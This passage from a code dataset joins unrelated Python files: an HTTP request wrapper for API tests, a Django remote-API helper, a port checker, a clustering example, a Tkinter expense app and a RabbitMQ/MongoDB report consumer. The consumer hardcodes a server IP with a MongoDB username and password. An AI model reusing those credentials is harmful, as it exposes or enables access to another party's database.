parser.add_argument('--feature_scale', nargs='?', type=int, default=1,\n                        help='Divider for # of features to use')\n    parser.add_argument('--resume', nargs='?', type=str, default=None,\n                        help='Path to previous saved model to restart from')\n    parser.add_argument('--gpu', type=int, default=1,\n                        help='gpu')\n\n\n    args = parser.parse_args()\n    train(args)\n","sub_path":"example/pytorch-semseg/train.pascal.deeplabv2.commonloader.epoch16.py","file_name":"train.pascal.deeplabv2.commonloader.epoch16.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"198972338","text":"\"\"\"\n============================\nauthor:MuSen\ntime:2019/6/12\nE-mail:3247119728@qq.com\n============================\n\"\"\"\nimport requests\nfrom common.logger import logger\n\n\"\"\"\nPurpose of this wrapper:\n1. Send the right type of request according to the request method in the test case\n2. Output login request logs\n\n\"\"\"\n\n\nclass HTTPRequest(object):\n    \"\"\"Sends requests directly, without keeping cookies \"\"\"\n\n    def request(self, method, url,\n                params=None, data=None,\n                headers=None, cookies=None, json=None):\n        # Determine the request method\n\n        method = method.lower()\n        if method == 'post':\n            # Check whether the parameters are passed as JSON (for APIs in the project that take JSON bodies)\n            if json:\n                logger.info('Sending request, url: {}, params: {}'.format(url, json))\n                return requests.post(url=url, json=json, headers=headers, cookies=cookies)\n            else:\n                logger.info('Sending request, url: {}, params: {}'.format(url, data))\n                return requests.post(url=url, data=data, headers=headers, cookies=cookies)\n        elif method == 'get':\n            logger.info('Sending request, url: {}, params: {}'.format(url, params))\n            return requests.get(url=url, params=params, headers=headers, cookies=cookies)\n\n\n
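# Added note (commentary): HTTPRequest above opens a fresh connection for every call, so\n# cookies set by one response are not sent with the next request. HTTPRequest2 below keeps\n# a requests.Session instead, which makes a login-then-recharge flow work, e.g. (names\n# reuse the __main__ demo below):\n#\n#     r2 = HTTPRequest2()\n#     r2.request('post', login_url, data=login_data)   # session stores login cookies\n#     r2.request('post', rech_url, data=data)          # cookies sent automatically\n#\n\n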
class HTTPRequest2(object):\n    \"\"\"Keeps cookies and reuses them for the next request \"\"\"\n\n    def __init__(self):\n        # Create a session object\n        self.session = requests.sessions.Session()\n\n    def request(self, method, url,\n                params=None, data=None,\n                headers=None, cookies=None, json=None):\n        # Determine the request method\n\n        method = method.lower()\n        if method == 'post':\n            # Check whether the parameters are passed as JSON (for APIs in the project that take JSON bodies)\n            if json:\n                logger.info('Sending request, url: {}, params: {}'.format(url, json))\n                return self.session.post(url=url, json=json, headers=headers, cookies=cookies)\n            else:\n                logger.info('Sending request, url: {}, params: {}'.format(url, data))\n                return self.session.post(url=url, data=data, headers=headers, cookies=cookies)\n        elif method == 'get':\n            logger.info('Sending request, url: {}, params: {}'.format(url, params))\n            return self.session.get(url=url, params=params, headers=headers, cookies=cookies)\n\n\nif __name__ == '__main__':\n    r = HTTPRequest()\n    login_url = \"http://test.lemonban.com/futureloan/mvc/api/member/login\"\n\n    login_data = {\"mobilephone\": \"15567678989\", \"pwd\": \"123qwe\"}\n    # Log in\n    r.request(method='post', url=login_url, data=login_data)\n    # Recharge\n    rech_url = \"http://test.lemonban.com/futureloan/mvc/api/member/recharge\"\n    # Build the recharge parameters\n    data = {\"mobilephone\": \"15567678989\", \"amount\": 100}\n    response = r.request(method='post', url=rech_url, data=data)\n    print(response.text)\n","sub_path":"APIautotest-python/api/uilt/api_02day/http_requests.py","file_name":"http_requests.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"339987863","text":"import operator\nimport pandas as pd\nfrom pwa.blueprints.auth.models import User\n\n\ndef parse_users():\n    dict_list = []\n    members = User.query.all()\n    for member in members:\n        member = member.__dict__\n        for item in member:\n            if member[item] is None:\n                member[item] = \"\"\n        try:\n            org = member['organization'].value\n        except AttributeError:\n            org = ''\n        try:\n            birth = member['birthday'].strftime(\"%B %e\")\n        except AttributeError:\n            birth = ''\n        dict_list.append({'Name': member['first_name'] + \" \" + member['last_name'],\n                          'Home Phone': member['home_phone'], 'Other Work Phone': member['other_work_phone'],\n                          'Cell Phone': member['cell_phone'], 'Birthday': birth, 'Email': member['email'], 'Organization': org})\n    dict_list = sorted(dict_list, key=operator.itemgetter(\"Organization\", \"Name\"), reverse=True)\n    df = pd.DataFrame()\n    for user in dict_list:\n        df = df.append(pd.Series(user), ignore_index=True)\n    column_order = [\"Name\", \"Organization\", \"Cell Phone\", \"Home Phone\", \"Other Work Phone\", \"Birthday\", \"Email\"]\n    df = df[column_order].T.to_dict()\n    return df\n","sub_path":"pwa/blueprints/mai_lab/services/parse_users.py","file_name":"parse_users.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174729709","text":"\nimport logging\nimport warnings\nfrom urllib.parse import quote\n\nimport requests\nfrom django.conf import settings\nfrom django.core.exceptions 
import ObjectDoesNotExist\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_remote_api_configured():\n return getattr(settings, 'GATEWAY_DATA_STORE_REMOTE_API', None) is not None\n\n\ndef call(request,\n path,\n path_params=None,\n method=\"get\",\n raise_for_status=True,\n base_url=\"/api\",\n **kwargs):\n\n headers = {\n 'Authorization': f'Bearer {request.authz_token.accessToken}'}\n encoded_path_params = {}\n if path_params is not None:\n for pk, pv in path_params.items():\n encoded_path_params[pk] = quote(pv)\n encoded_path = path.format(**encoded_path_params)\n logger.debug(f\"encoded_path={encoded_path}\")\n remote_api_url = settings.GATEWAY_DATA_STORE_REMOTE_API\n if remote_api_url.endswith(\"/api\"):\n warnings.warn(f\"Set GATEWAY_DATA_STORE_REMOTE_API to \\\"{remote_api_url}\\\". /api is no longer needed.\", DeprecationWarning)\n remote_api_url = remote_api_url[0:remote_api_url.rfind(\"/api\")]\n r = requests.request(\n method,\n f'{remote_api_url}{base_url}{encoded_path}',\n headers=headers,\n **kwargs,\n )\n if raise_for_status:\n r.raise_for_status()\n return r\n\n\ndef raise_if_404(response, msg, exception_class=ObjectDoesNotExist):\n if response.status_code == 404:\n raise exception_class(msg)\n","sub_path":"airavata_django_portal_sdk/remoteapi.py","file_name":"remoteapi.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"612960071","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"Unit tests for parse_run.py\n\n\"\"\"\n\nimport unittest\nimport json\nimport parse_run\n\nclass TestParseMethods(unittest.TestCase):\n\n def setUp(self):\n results_file = 'test_data/results.json'\n\n json_data = open(results_file)\n self.run_dict = json.load(json_data)\n\n def test_open_run_missing_user(self):\n \"\"\"Confirm user is optional\n \"\"\"\n del self.run_dict['user']\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(run.instrument, 'tricorder')\n\n def test_open_run_all_units_created(self):\n \"\"\"Confirm all 8 units created\n \"\"\"\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(len(run.plate.chips[0].units), 8)\n\n def test_open_run_partial_units_created(self):\n \"\"\"Confirm partial units created\n Remove ROI4 images and test for 6 units\n \"\"\"\n del self.run_dict['plate']['chips'][0]['images'][15]\n del self.run_dict['plate']['chips'][0]['images'][14]\n del self.run_dict['plate']['chips'][0]['images'][13]\n del self.run_dict['plate']['chips'][0]['images'][12]\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(len(run.plate.chips[0].units), 6)\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test_parse_run.py","file_name":"test_parse_run.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596983572","text":"#!/bin/python\nimport socket\n\ndef net_port(addr,port):\n try:\n ip = socket.gethostbyname(addr)\n sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sk.settimeout(2)\n sk.connect((ip,port))\n sk.close()\n return 1\n except Exception:\n return 0\n# print(net_port(\"192.168.1.182\",3306))","sub_path":"check_netport.py","file_name":"check_netport.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"278196647","text":"from __future__ import absolute_import, division, print_function, 
unicode_literals\n\nimport glob\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.decomposition import IncrementalPCA\nimport numpy as np\n\nfrom elm.config.dask_settings import client_context\nfrom elm.model_selection.kmeans import kmeans_model_averaging, kmeans_aic\nfrom elm.pipeline import steps, Pipeline\nfrom elm.readers import *\nfrom elm.sample_util.band_selection import select_from_file\nfrom elm.sample_util.metadata_selection import meta_is_day\n\nELM_EXAMPLE_DATA_PATH = os.environ['ELM_EXAMPLE_DATA_PATH']\nband_specs = list(map(lambda x: BandSpec(**x),\n        [{'search_key': 'long_name', 'search_value': \"Band 1 \", 'name': 'band_1'},\n         {'search_key': 'long_name', 'search_value': \"Band 2 \", 'name': 'band_2'},\n         {'search_key': 'long_name', 'search_value': \"Band 3 \", 'name': 'band_3'},\n         {'search_key': 'long_name', 'search_value': \"Band 4 \", 'name': 'band_4'},\n         {'search_key': 'long_name', 'search_value': \"Band 5 \", 'name': 'band_5'},\n         {'search_key': 'long_name', 'search_value': \"Band 6 \", 'name': 'band_6'},\n         {'search_key': 'long_name', 'search_value': \"Band 7 \", 'name': 'band_7'},\n         {'search_key': 'long_name', 'search_value': \"Band 9 \", 'name': 'band_9'},\n         {'search_key': 'long_name', 'search_value': \"Band 10 \", 'name': 'band_10'},\n         {'search_key': 'long_name', 'search_value': \"Band 11 \", 'name': 'band_11'}]))\nHDF4_FILES = [f for f in glob.glob(os.path.join(ELM_EXAMPLE_DATA_PATH, 'hdf4', '*hdf'))\n              if meta_is_day(load_hdf4_meta(f))]\ndata_source = {\n    'sampler': select_from_file,\n    'band_specs': band_specs,\n    'args_list': HDF4_FILES,\n}\n\n\npipeline_steps = [steps.Flatten(),\n                  ('scaler', steps.StandardScaler()),\n                  ('pca', steps.Transform(IncrementalPCA(n_components=4), partial_fit_batches=2)),\n                  ('kmeans', MiniBatchKMeans(n_clusters=4, compute_labels=True)),]\npipeline = Pipeline(pipeline_steps,\n                    scoring=kmeans_aic,\n                    scoring_kwargs=dict(score_weights=[-1]))\n\nensemble_kwargs = {\n    'model_selection': kmeans_model_averaging,\n    'model_selection_kwargs': {\n        'drop_n': 2,\n        'evolve_n': 2,\n    },\n    'init_ensemble_size': 4,\n    'ngen': 3,\n    'partial_fit_batches': 2,\n    'saved_ensemble_size': 4,\n}\n\n\ndef main(pipe=None):\n    with client_context() as client:\n        ensemble_kwargs['client'] = client\n        if pipe is None:\n            pipe = pipeline\n        pipe.fit_ensemble(**data_source, **ensemble_kwargs)\n        pred = pipe.predict_many(**data_source, **ensemble_kwargs)\n    ensemble_kwargs.pop('client')\n    return pipe, pred\n\nif __name__ == '__main__':\n    pipe, pred = main()\n    if 'plot' in sys.argv:\n        pred[0].predict.plot.pcolormesh()\n        plt.show()\n","sub_path":"examples/api_example_mods.py","file_name":"api_example_mods.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"471042071","text":"\r\nfrom tkinter import *\r\nfrom tkinter import ttk, messagebox\r\nimport csv\r\nfrom datetime import datetime\r\n\r\nGUI = Tk()\r\nGUI.title('โปรแกรมบันทึกค่าใช้จ่าย V.1.0 by Nakin')\r\nGUI.geometry('700x900+600+0')\r\n\r\n# ---------------MENU-------------------\r\nmenubar = Menu(GUI)\r\nGUI.config(menu=menubar)\r\n\r\n# file menu\r\nfilemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='File',menu=filemenu)\r\nfilemenu.add_command(label='Import csv')\r\nfilemenu.add_command(label='Export to Googlesheet')\r\n\r\n
def About():\r\n    print('About Menu')\r\n    messagebox.showinfo('About','สวัสดีครับ โปรแกรมนี้คือโปรแกรมบันทึกข้อมูล\\nสนใจบริจาคเราไหม? ขอ 1 BTC ก็พอแล้ว\\nBTC Address:abc')\r\n\r\n\r\nhelpmenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Help',menu=helpmenu)\r\nhelpmenu.add_command(label='About',command=About)\r\n\r\ndef Donate():\r\n    messagebox.showinfo('Donate','XRP Address:rpXTzCuXtjiPDFysxq8uNmtZBe9Xo97JbW\\nXRP Deposit Tag:1023997855')\r\n\r\n\r\ndonatemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Donate',menu=donatemenu)\r\ndonatemenu.add_command(label='Donate',command=Donate)\r\n\r\n\r\n\r\n\r\n\r\n\r\nTab = ttk.Notebook(GUI)\r\n\r\nT1 = Frame(Tab)\r\nT2 = Frame(Tab)\r\n\r\nTab.pack(fill=BOTH,expand=1)\r\n\r\nroob1=PhotoImage(file='Gold.png').subsample(44)\r\nroob2=PhotoImage(file='Gold2.png').subsample(5)\r\nroob3=PhotoImage(file='Eye.png').subsample(7)\r\n\r\n\r\nTab.add(T1,text=f'{\"Add expense\":^{30}}',image=roob1,compound='top')\r\nTab.add(T2,text=f'{\"Expense list\":^{30}}',image=roob2,compound='top')\r\n\r\n\r\n\r\nF1 =Frame(T1)\r\nF1.pack()\r\ndays = {'Mon':'จันทร์',\r\n        'Tue':'อังคาร',\r\n        'Wed':'พุธ',\r\n        'Thu':'พฤหัสบดี',\r\n        'Fri':'ศุกร์',\r\n        'Sat':'วันเสาร์',\r\n        'Sun':'อาทิตย์'}\r\n\r\n\r\ndef Save(event=None):\r\n    expense = v_expense.get()\r\n    price = v_price.get()\r\n    geeaun = v_geeaun.get()\r\n\r\n    if expense == '':\r\n        print('No Data')\r\n        messagebox.showwarning('Error','กรุณากรอกข้อมูลค่าใช้จ่าย')\r\n        return\r\n    elif price == '':\r\n        messagebox.showwarning('Error','กรุณากรอกราคา')\r\n        return\r\n    elif geeaun == '':\r\n        geeaun = 1\r\n\r\n    try:\r\n        lakartungmod = float(price)*float(geeaun)\r\n        print('รายการ: {} ราคา: {} จำนวน: {} ราคารวม {} '.format(expense,price,geeaun,lakartungmod))\r\n        text ='รายการ: {} ราคา: {} จำนวน: {} ราคารวม {}\\n '.format(expense,price,geeaun,lakartungmod)\r\n        today = datetime.now().strftime('%a')\r\n        dt = datetime.now().strftime('%d-%m-%Y-{} %H:%M:%S'.format(days[today]))\r\n        text= text+dt\r\n        v_result.set(text)\r\n\r\n        v_expense.set('')\r\n        v_price.set('')\r\n        v_geeaun.set('')\r\n        print(dt)\r\n\r\n        with open('savedata.csv','a',encoding='utf-8',newline='') as f:\r\n            fw = csv.writer(f)\r\n            data = [dt,expense,price,geeaun,lakartungmod]\r\n            fw.writerow(data)\r\n\r\n        E1.focus()\r\n        update_table()\r\n    except Exception as e:\r\n\r\n        print('ERROR:',e)\r\n        messagebox.showwarning('Error','กรุณากรอกข้อมูลใหม่ คุณกรอกตัวเลขผิด')\r\n        v_expense.set('')\r\n        v_price.set('')\r\n        v_geeaun.set('')\r\n\r\nGUI.bind('<Return>',Save)\r\n\r\n
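# Added worked example (commentary): with expense='coffee', price='45', geeaun='2' the\r\n# handler above computes lakartungmod = 45.0 * 2 = 90.0 and appends a CSV row like\r\n# [dt, 'coffee', '45', '2', 90.0], where dt is datetime.now() formatted as\r\n# '%d-%m-%Y-<Thai day name> %H:%M:%S' via the days mapping.\r\n\r\n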
FONT1 = (None,20)\r\n\r\nbg = PhotoImage(file='city.png').subsample(7)\r\ncitypic = ttk.Label(F1, image=bg)\r\ncitypic.pack()\r\n\r\n#----------------text1-------------\r\nL = ttk.Label(F1,text = 'รายการค่าใช้จ่าย',font =FONT1).pack()\r\nv_expense =StringVar()\r\nE1 = ttk.Entry(F1,textvariable=v_expense,font=FONT1)\r\nE1.pack()\r\n#----------------------------------\r\n\r\n#----------------text2-------------\r\nL = ttk.Label(F1,text = 'ราคา(บาท)',font =FONT1).pack()\r\nv_price =StringVar()\r\nE2 = ttk.Entry(F1,textvariable=v_price,font=FONT1)\r\nE2.pack()\r\n#----------------------------------\r\n#------------------text3--------------------\r\nL = ttk.Label(F1,text = 'จำนวน(ชิ้น)',font =FONT1).pack()\r\nv_geeaun =StringVar()\r\nE3 = ttk.Entry(F1,textvariable=v_geeaun,font=FONT1)\r\nE3.pack()\r\n\r\n\r\nB2 = ttk.Button(F1,text='Save',image=roob3,compound='top',command=Save)\r\nB2.pack(ipadx=20,ipady=20,pady = 10)\r\n\r\nv_result = StringVar()\r\nv_result.set('---------ผลลัพธ์---------')\r\nresult = ttk.Label(F1, textvariable=v_result,font=FONT1,foreground='green')\r\nresult.pack(pady=20)\r\n\r\n#-------------------Tab2---------------------\r\n\r\ndef read_csv():\r\n    with open('savedata.csv',newline ='',encoding='utf-8') as f:\r\n        fr = csv.reader(f)\r\n        data = list(fr)\r\n    return data\r\n\r\n#table\r\n\r\nL = ttk.Label(T2,text = 'ตารางแสดงผลลัพธ์ทั้งหมด',font =FONT1).pack(pady=20)\r\n\r\n\r\nheader = ['วัน-เวลา','รายการ','ค่าใช้จ่าย','จำนวน','รวม']\r\nresulttable = ttk.Treeview(T2,columns=header,show ='headings',height =20)\r\nresulttable.pack()\r\n\r\nfor h in header:\r\n    resulttable.heading(h,text = h)\r\n\r\nheaderwidth = [150,170,80,80,80]\r\nfor h,w in zip(header,headerwidth):\r\n    resulttable.column(h,width = w)\r\n\r\n\r\ndef update_table():\r\n    resulttable.delete(*resulttable.get_children())\r\n    data = read_csv()\r\n    for d in data:\r\n        resulttable.insert('',0,values=d)\r\n\r\nupdate_table()\r\n\r\nGUI.mainloop()\r\n","sub_path":"GUIbasic2-expense.py","file_name":"GUIbasic2-expense.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227626219","text":"import json\nimport pika\nimport sys\nimport uuid\nimport datetime\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\n
credentials = pika.PlainCredentials('guest', 'guest')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('95.181.230.220',\n                                                               5672,\n                                                               '/',\n                                                               credentials))\n# connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n\nchannel = connection.channel()\nchannel.queue_declare(queue='rpc_queue_modules')\nchannel.queue_declare(queue='rpc_queue_modules_for_date')\nchannel.queue_declare(queue='rpc_queue_report_data1')\n\n# channel.exchange_declare(exchange='logs', exchange_type='fanout')\n\nclient = MongoClient('95.181.230.220', 38128, username='SuperNora9', password='tYf74-Gnet5_yhx')\n# client = MongoClient('localhost', 27017)\n\ndef reduce_data(mass):\n    # Guard: with fewer than 24 samples the original interval would be 0 and the first\n    # sample would be repeated 24 times, so return the series unchanged instead.\n    if len(mass) < 24:\n        return mass\n    interval = len(mass) // 24\n    new_mass = []\n    for i in range(24):\n        new_mass.append(mass[i*interval])\n    return new_mass\n\n\n\n\n
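# Added worked example (commentary): for a day of one-minute readings, len(mass) = 1440,\n# interval = 1440 // 24 = 60, and reduce_data() keeps the samples at indices 0, 60, ...,\n# 1380, i.e. one value per hour, 24 points in total.\n\n\n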
def send_response(greenhouseID):\n    data = []\n    # from_date = datetime.datetime.now() - datetime.timedelta(days=1)\n    from_date = datetime.datetime.now() - datetime.timedelta(hours=1)\n    to_date = datetime.datetime.now()\n    pipeline = [\n        {\"$unwind\": \"$components.values\"},\n        {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n        {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n        {\"$sort\": {'type': 1}}\n    ]\n    # collection = client.data.greenhouses.find_one({\"_id\":ObjectId(greenhouseID)})\n    c = client.laboratory.modules.aggregate(pipeline)\n    for record in c:\n        record['key'] = 'modules'\n        data.append(json.dumps(record, default=str))\n    data.append(json.dumps({'key':'end'}))\n    return data\n\ndef send_response_module_for_date(str_date):\n    data = []\n    date = datetime.datetime.strptime(str_date, '%Y-%m-%d').date()\n    from_date = datetime.datetime(int(date.year), int(date.month), int(date.day), 0, 0, 0)\n    to_date = datetime.datetime(int(date.year), int(date.month), int(date.day), 23, 59, 59)\n    pipeline = [\n        {\"$unwind\": \"$components.values\"},\n        {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n        {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n        {\"$sort\": {'type': 1}}\n    ]\n    c = client.laboratory.modules.aggregate(pipeline)\n    for record in c:\n        record['values'] = reduce_data(record['values'])\n        record['key'] = 'modules'\n        data.append(json.dumps(record, default=str))\n    data.append(json.dumps({'key':'end'}))\n    return data\n\ndef send_response_data_for_reports(payload):\n    data = []\n    startDate = datetime.datetime.strptime(payload[\"startDate\"], '%Y-%m-%d %H:%M:%S')\n    endDate = datetime.datetime.strptime(payload[\"endDate\"], '%Y-%m-%d %H:%M:%S')\n    from_date = datetime.datetime(int(startDate.year), int(startDate.month), int(startDate.day), int(startDate.hour), int(startDate.minute), int(startDate.second))\n    to_date = datetime.datetime(int(endDate.year), int(endDate.month), int(endDate.day), int(endDate.hour), int(endDate.minute), int(endDate.second))\n    print(from_date)\n    print(to_date)\n    pipeline = [\n        {\"$unwind\": \"$components.values\"},\n        {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n        {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n        {\"$sort\": {'type': 1}}\n    ]\n    c = client.laboratory.modules.aggregate(pipeline)\n    for record in c:\n        record['values'] = reduce_data(record['values'])\n        record['key'] = 'reports'\n        data.append(json.dumps(record, default=str))\n    data.append(json.dumps({'key':'end'}))\n    print(data)\n    return data\n\ndef on_request_modules(ch, method, props, body):\n    payload = json.loads(body)\n    data = []\n    if (payload['action'] == \"MODULES\"):\n        if ('greenhouse' in payload):\n            greenhouse = payload['greenhouse']\n        else:\n            greenhouse = \"5fa953edf3be7ea1552f2485\"\n        data = send_response(greenhouseID = greenhouse)\n    for list in data:\n        ch.basic_publish(exchange='',routing_key='data-for-server_modules', body=list)\n    ch.basic_ack(delivery_tag=method.delivery_tag)\n\ndef on_request_modules_for_date(ch, method, props, body):\n    payload = json.loads(body)\n    data = []\n    # if (payload['action'] == \"MODULES_FOR_DATE\"):\n    #     data = send_response_module_for_date(payload['date'])\n    for list in data:\n        ch.basic_publish(exchange='',routing_key='data-for-server_modules_for_date', body=list)\n    ch.basic_ack(delivery_tag=method.delivery_tag)\n\ndef on_request_report_data(ch, method, props, body):\n    payload = json.loads(body)\n    data = []\n    print(\"here\")\n    data = send_response_data_for_reports(payload)\n    for list in data:\n        ch.basic_publish(exchange='',routing_key='data-for-server_data_for_reports1', body=list)\n    ch.basic_ack(delivery_tag=method.delivery_tag)\n\nchannel.basic_qos(prefetch_count=1)\nchannel.basic_consume(queue='rpc_queue_modules', on_message_callback=on_request_modules)\nchannel.basic_consume(queue='rpc_queue_report_data1', on_message_callback=on_request_report_data)\nchannel.basic_consume(queue='rpc_queue_modules_for_date', on_message_callback=on_request_modules_for_date)\n\nprint(\" [x] Awaiting RPC requests\")\nprint(\" test #2\")\nchannel.start_consuming()","sub_path":"getModuleData.py","file_name":"getModuleData.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"61288020","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\n\r\na = [[1, 2, 3],\r\n     [4, 5, 6]]\r\n\r\na = np.array(a)\r\n\r\ndef sigmoid(x):\r\n    return 1 / (1 + np.exp(-x))\r\n\r\n\r\ndata = {\r\n    'a': [\r\n        'A101',\r\n        'B101',\r\n        'C101',\r\n        'A101',\r\n        'A101',\r\n        'A101',\r\n        'C101',\r\n        np.NaN,\r\n        'A101',\r\n    ]\r\n}\r\ndf = DataFrame(data)\r\n\r\ndf.a = df.a.fillna('0').apply(lambda x: x[0])\r\nprint(pd.Categorical(df.a).codes)","sub_path":"numpy-learning/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424782620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 21 16:25:20 2018\n\n@author: houlu\n\"\"\"\nimport sys\nimport random\nimport itertools\nimport numpy as np\nfrom collections.abc import Sequence\n\n\nclass Snake(Sequence):\n\n    UP = (-1, 0)\n    DOWN = (1, 0)\n    RIGHT = (0, 1)\n    LEFT = (0, -1)\n    INITIAL_POS = [(1, 4), (1, 3), (1, 2), (1, 1)]\n\n    def __init__(self):\n        self.all_directions = [self.LEFT, self.RIGHT, self.UP, self.DOWN]\n        self.dir_names = ['left', 'right', 'up', 'down']\n        self.dir2names = dict(zip(self.all_directions, self.dir_names))\n        self.dirnumber = len(self.all_directions)\n        self.action_to_direction = dict(enumerate(self.all_directions))\n\n    def __getitem__(self, item):\n        return self.pos[item]\n\n    def 
__len__(self):\n return len(self.pos)\n\n def __iter__(self):\n return iter(self.pos)\n\n def __contains__(self, item):\n return item in self.pos\n\n @staticmethod\n def _tuple_add(t1, t2):\n return t1[0] + t2[0], t1[1] + t2[1]\n\n @property\n def occupation(self):\n return set(self)\n\n @property\n def inversion(self):\n return -self.direction[0], -self.direction[1]\n\n def move(self):\n self.pos.insert(0, self._tuple_add(self.head, self.direction))\n self.pos.pop(-1)\n self.head = self[0]\n\n def turn(self, action_index):\n if action_index is None:\n return\n try:\n next_direction = self.action_to_direction[action_index]\n except KeyError:\n return\n if next_direction == self.inversion:\n return\n else:\n self.direction = next_direction\n\n def eat(self, food):\n if self.head == food:\n self.pos.append(self.pos[-1])\n return True\n else:\n return False\n\n @property\n def available_directions(self):\n return [ind\n for ind, action in enumerate(self.all_directions)\n if not (self._tuple_add(self.head, action) == self[1])\n ]\n\n def reset(self):\n self.pos = self.INITIAL_POS[:]\n self.head = self[0]\n self.direction = self.RIGHT\n\n\nclass Food:\n\n def __init__(self):\n self.color = (52, 115, 243)\n\n @staticmethod\n def _gen(allowed):\n return random.choice(allowed)\n\n def replenish(self, allowed):\n self.pos = self._gen(allowed)\n\n\nclass Game:\n\n def __init__(self, number):\n self.number = number\n self.state_number = self.number + 2\n self.boundry = (1, self.number + 1)\n self.shape = (self.state_number, self.state_number)\n self.grid = set(itertools.product(range(*self.boundry), range(*self.boundry)))\n self.value = {\n 'head': 1,\n 'body': -1,\n 'food': 2,\n 'wall': -2,\n 'earth': 0\n }\n\n self._state = np.zeros(self.shape)\n self.snake = Snake()\n self.food = Food()\n self.reset()\n\n self.score = 0\n\n @property\n def allowed(self):\n return list(self.grid - self.snake.occupation)\n\n @property\n def actions(self):\n return self.snake.available_directions\n\n @property\n def state(self):\n self._state[1:self.number + 1, 1:self.number + 1] = self.value['earth']\n self._state[self.food.pos[0], self.food.pos[1]] = self.value['food']\n for body in self.snake:\n self._state[body[0], body[1]] = self.value['body']\n self._state[self.snake.head[0], self.snake.head[1]] = self.value['head']\n # return np.array([self._state]).reshape(self.state_number, self.state_number, 1)\n return self._state\n\n @property\n def eat(self):\n return self.snake.eat(self.food.pos)\n\n @property\n def size(self):\n return self.state_number, self.snake.dirnumber\n\n @property\n def info(self):\n info = 'Map shape: {} -\\nScore: {}'.format(self.shape, self.score)\n return info\n\n @property\n def death(self):\n body = self.snake[1:]\n if self.snake.head in body:\n return True\n if (not self.boundry[0] <= self.snake.head[0] < self.boundry[1])\\\n or (not self.boundry[0] <= self.snake.head[1] < self.boundry[1]):\n return True\n return False\n\n @property\n def done(self):\n return self.death\n\n def step(self, action):\n self.snake.turn(action)\n self.snake.move()\n return self.state, self.reward, self.done, self.info\n\n def render(self, window):\n window.draw(self.state)\n\n def reset(self):\n self.snake.reset()\n self.food.replenish(self.allowed)\n self._state[[0, self.number + 1], :] = self.value['wall']\n self._state[:, [0, self.number + 1]] = self.value['wall']\n\n def new_food(self):\n self.score += 1\n self.food.replenish(self.allowed)\n\n @property\n def reward(self):\n if self.eat:\n return 1\n elif 
self.death:\n            return -0.5\n        else:\n            return -0.005\n\n    def play(self, engine=None):\n        if engine:\n            self.render(engine)\n        while True:\n            if engine:\n                action_index = engine.action\n                if action_index is False:\n                    return\n            else:\n                action_index = self.snake.direction\n            self.step(action_index)\n            if self.eat:\n                self.new_food()\n            if engine:\n                self.render(engine)\n            if self.death:\n                return\n\n    def close(self, window):\n        try:\n            window.close()\n        except AttributeError:\n            del window\n\n\nif __name__ == '__main__':\n    base_size = 20\n    expansion = 1.5\n    number = 10\n    g = Game(number=number)\n    from window import Window\n    window = Window(number=number, block_size=base_size, expansion=expansion, speed=0.1)\n    g.play(engine=window)\n    sys.exit(0)\n","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"394536812","text":"# -*- coding:utf-8 -*-\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom 